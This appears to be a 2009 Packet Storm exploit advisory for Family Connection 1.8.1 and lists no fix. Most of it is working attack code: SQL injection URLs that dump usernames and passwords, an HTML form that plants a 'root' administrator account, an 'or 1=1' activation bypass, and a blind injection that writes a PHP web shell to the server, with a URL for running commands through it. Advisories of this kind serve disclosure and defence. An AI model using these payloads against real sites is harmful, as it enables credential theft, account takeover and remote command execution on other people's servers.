Family Connection 1.8.1 SQL Injection

2009-03-30T00:00:00
ID PACKETSTORM:76175
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-03-30T00:00:00

Description

                                        
                                            `******* Salvatore "drosophila" Fresta *******  
  
[+] Application: Family Connection  
[+] Version: 1.8.1  
[+] Website: http://www.familycms.com  
  
[+] Bugs: [A] Multiple SQL Injection  
[B] Create Admin User  
[C] Blind SQL Injection   
  
[+] Exploitation: Remote  
[+] Date: 25 Mar 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: drosophilaxxx@gmail.com  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Multiple SQL Injection  
  
[-] Requisites: magic_quotes_gpc = on/off  
  
These bugs allows a registered user to view  
username and password of all registered users.  
  
  
- [B] Create Admin User  
  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: register.php, activate.php  
  
This bug allow a guest to create an account with  
administrator privileges.  
  
  
- [C] Blind SQL Injection  
  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: lostpw.php  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Multiple SQL Injection  
  
http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23  
  
http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users  
  
http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23  
  
  
- [B] Create Admin User  
  
<html>  
<head>  
<title>Family Connection 1.8.1 Create Admin User Exploit</title>  
</head>  
<body>  
<p>This exploit creates an user with administrator privileges using follows information:<br>  
Username: root<br>  
Password: toor<br>  
<form action="http://localhost/fcms/register.php" method="POST">  
<input type="hidden" name="username" value="blabla">  
<input type="hidden" name="password" value="blabla">  
<input type="hidden" name="email" value="blabla@blabla.blabla">  
<input type="hidden" name="fname" value="blabla">  
<input type="hidden" name="lname" value="blabla">  
<input type="hidden" name="year" value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'root@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#'">  
<input type="submit" name="submit" value="Exploit">  
</form>  
</body>  
</html>  
  
To activate accounts:  
  
http://www.site.com/path/activate.php?uid=1 or 1=1&code=  
  
  
[C] Blind SQL Injection  
  
POST /path/lostpw.php HTTP/1.1\r\n"  
Host: www.site.com\r\n"  
Content-Type: application/x-www-form-urlencoded\r\n"  
Content-Length: 193\r\n\r\n"  
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'#  
  
To execute commands:  
  
http://www.site.com/path/rce.php?cmd=ls  
  
  
*************************************************  
  
[+] Fix  
  
No fix.  
  
  
*************************************************  
`